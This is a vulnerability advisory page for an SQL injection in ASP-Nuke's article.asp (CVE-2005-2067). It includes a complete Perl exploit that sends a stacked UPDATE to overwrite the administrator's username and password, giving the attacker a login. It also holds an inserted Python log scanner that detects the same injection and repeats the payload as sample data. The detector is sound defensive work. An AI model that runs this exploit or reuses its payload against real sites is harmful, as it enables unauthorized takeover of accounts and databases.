ASPNuke 'article.asp' SQL Injection Vulnerability

Vulnerability ID: 1108900    Vulnerability type: SQL injection
Published: 2005-06-27    Updated: 2005-10-20
CVE ID: CVE-2005-2067
CNNVD-ID: CNNVD-200506-217
Platform: ASP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/1070
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-217
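|Vulnerability details
ASP-Nuke is an open-source software application for running community-based sites on a web server. ASP-Nuke has an input validation vulnerability in its handling of user requests that lets a remote attacker gain unauthorized access to the database. The article.asp script in ASP-Nuke does not properly filter the articleid parameter, so a remote attacker can insert SQL statements into the input and operate on the database without authorization, leading to disclosure of sensitive information or complete control of ASP-Nuke.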
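A defender-side check for the flaw described above, as an added example that is not part of the original advisory or of ASP-Nuke: it scans web access-log lines for requests to article.asp whose articleid does not decode to a plain integer. The log lines are constructed, and the log layout and the integer-only ID rule are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (not from the page); the layout is an assumption.
SAMPLE_LOG = [
    '198.51.100.7 "GET /module/article/article/article.asp?articleid=12 HTTP/1.1" 200',
    '198.51.100.9 "GET /module/article/article/article.asp?articleid=1%20;%20update'
    '%20tbluser%20SET%20username=%27x%27%20-- HTTP/1.0" 200',
    '198.51.100.9 "GET /Module/Article/Article/Article.asp?ArticleID=7abc HTTP/1.0" 500',
    '198.51.100.3 "GET /default.asp?articleid=abc HTTP/1.1" 200',
    'service restarted',
]

TARGET_SCRIPT = "/article.asp"        # script named in the advisory
PARAM = "articleid"                   # parameter named in the advisory
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
VALID_ID = re.compile(r"[0-9]{1,9}")  # assumption: article IDs are ASCII integers

def article_ids(url):
    """Yield URL-decoded articleid values from a request to article.asp.

    Path and parameter names are compared case-insensitively, as IIS/ASP does.
    The query is split on '&' only, so a ';' stays inside the value.
    """
    parts = urlsplit(url)
    if not parts.path.lower().endswith(TARGET_SCRIPT):
        return
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name).lower() == PARAM:
            yield unquote_plus(value)

def suspicious_requests(lines):
    """Return (line_number, decoded_value) for each non-integer articleid."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQ_RE.search(line)
        if not match:
            continue  # not a request line
        for value in article_ids(match.group(1)):
            if not VALID_ID.fullmatch(value):
                hits.append((lineno, value))
    return hits

if __name__ == "__main__":
    for lineno, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {lineno}: non-integer articleid {value!r}")
```

The same allow-list rule, applied in the script before the value reaches the query, is what rejects this class of input at the source.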
|Exploit
#!/usr/bin/perl
######################################################################################
#        T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m
######################################################################################
# EXPLOIT FOR: ASPNuke ASP Portal
#
# Expl0it By: [email protected]
#
# Discovered By: Trap-Set Underground Hacking Team (oil_KarchacK)
#
######################################################################################
#  GR33tz T0 ==>    Alpha_programmer  --  oil_Karchack  --  the_CephaleX  -- Str0ke
#  And Iranian Security & Technical Sites:
#  IHS TeaM , alphaST , Shabgard Security Team  , Emperor Hacking Team  ,
#  Crouz Security Team , Hat-squad security team  & Simorgh-ev Security Team
######################################################################################
use IO::Socket;

if (@ARGV < 1)
{
 print "\n==========================================\n";
 print " \n     -- Exploit By mh_p0rtal --\n\n";
 print "     Trap-Set Underground Hacking Team      \n\n";
 print "         Usage:ASPNuke.pl <T4rg3t> \n\n";
 print "==========================================\n\n";
 print "Examples:\n\n";
 print "   ASPNuke.pl www.Site.com \n";
 exit();
}

my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "[+]C0nn3cted\n";

# The articleid value carries a stacked UPDATE that rewrites the username and
# password of userID=1 in tbluser; the trailing "--" comments out the rest of the query.
$addr = "GET /module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c'%20,%20username='trapset'%20where%20userID=1%20-- HTTP/1.0\n";
$addr .= "Host: $host\n\n\n\n";
print "\n";
print $remote $addr;
print "[+]Wait...";
sleep(5);
print "Wait For Changing Password ...\n";

print "[+]OK , Now Login With : \n";
print "Username: trapset\n";
print "Password: trapset\n\n";


# milw0rm.com [2005-06-27]
|References

Source: BUGTRAQ
Name: 20050627aspnukeisvulnerabletosqlinjection
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111989828622112&w=2
Source: BID
Name: 18215
Link: http://www.securityfocus.com/bid/18215
Source: MISC
Link: http://downloads.securityfocus.com/vulnerabilities/exploits/ASPNuke-0601-sql.txt
